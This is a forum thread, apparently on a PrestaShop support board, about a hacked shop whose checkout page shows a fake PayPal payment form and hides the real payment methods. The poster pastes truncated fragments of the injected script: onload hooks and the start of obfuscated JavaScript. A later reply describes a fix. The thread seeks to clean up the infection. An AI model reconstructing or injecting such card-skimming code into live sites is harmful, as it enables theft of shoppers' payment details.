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Fake Paypal payment form at order page, other payment modules not see at site.


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Hi friends.

old client site at prestashop with custom - was attacked.

paypal module - not installed, paypal payment way on site - not integrated.

but at payment form https://xxxxxxxxxx.ua/quick-order

we see fake paypal form (screen)

(really at this site have other standart pay modules -  bank, cheque, and COD, but - They not visible!)

in sources page see bad codes(code listing),

we scan and find this with other variants and variables - nothing.

cleaning.zip - see more suspiciously files, but they not have bad codes (custom modules and theme)

has anyone encountered this ?

way to resolve this ?


how add example ?

script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="5d9bdb33b8cdd84910e78b76-|49">/script

body onload="WindowPaymentPaypal();

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(document).ready(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(window).load(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" var full = '--'; var _0xd951=

var _0x3977=["\x69\x6E\x70\x75\x74","\

and more 


Edited by skur2000
i edit url order page at site (see edit history)
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7 hours ago, skur2000 said:

Hi friends.

old client site at prestashop with custom - was attacked.

paypal module - not installed, paypal payment way on site - not integrated.

but at payment form xxxxxxxxxxxxxxxxxxxxx

we see fake paypal form (screen)

(really at this site have other standart pay modules -  bank, cheque, and COD, but - They not visible!)

in sources page see bad codes(code listing),

we scan and find this with other variants and variables - nothing.

cleaning.zip - see more suspiciously files, but they not have bad codes (custom modules and theme)

has anyone encountered this ?

way to resolve this ?


how add example ?

script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="5d9bdb33b8cdd84910e78b76-|49">/script

body onload="WindowPaymentPaypal();

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(document).ready(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(window).load(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" var full = '--'; var _0xd951=

var _0x3977=["\x69\x6E\x70\x75\x74","\

and more 



careful the cart link still points to your website

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  • 11 months later...

Just had this virus on one of my customer's PS 1.6. shops. It helped to upload a clean /tools folder and add a patch to smarty.config.inc.php. It's also good to analyze the logs in case the attack came through some module.

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